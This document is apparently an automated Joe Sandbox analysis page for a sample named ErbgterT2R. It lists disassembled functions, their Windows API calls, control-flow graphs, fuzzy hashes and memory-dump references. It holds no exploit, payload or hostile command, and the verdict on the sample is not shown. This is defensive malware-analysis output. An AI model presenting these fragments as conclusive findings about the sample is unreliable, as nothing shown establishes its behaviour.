                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID: ExecuteFile
                                                                                            • API String ID: 1033339047-323923146
                                                                                            • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                                            • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                                            • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                                            • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D
                                                                                            Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                            • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memmove
                                                                                            • String ID:
                                                                                            • API String ID: 3828600508-0
                                                                                            • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                                            • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                                            • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                                            • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                                            Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID: @
                                                                                            • API String ID: 1890195054-2766056989
                                                                                            • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                            • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                                            • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                            • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                                            Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                                              • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                              • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                              • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                                            • String ID:
                                                                                            • API String ID: 4269121280-0
                                                                                            • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                            • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                                            • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                            • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                                            Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1329742358-0
                                                                                            • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                            • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                            • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                            • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                            Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                                            • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                                            • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                                            • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                                            Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastPointer
                                                                                            • String ID:
                                                                                            • API String ID: 2976181284-0
                                                                                            • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                            • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                                            • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                            • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                                            Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                                            • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocExceptionStringThrow
                                                                                            • String ID:
                                                                                            • API String ID: 3773818493-0
                                                                                            • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                            • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                                            • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                            • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                                            Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 3168844106-0
                                                                                            • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                            • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                                            • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                            • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                                            Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                            • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                                            • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                            • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                                            Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                            • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                                            • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                            • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                                            Function 00411A2D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                                            • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                                                                            • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                                            • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                                                                            Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3498533004-0
                                                                                            • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                            • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                                            • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                            • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                                            Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                            • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                                            • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                            • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                                            Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _beginthreadex.MSVCRT ref: 00406552
                                                                                              • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
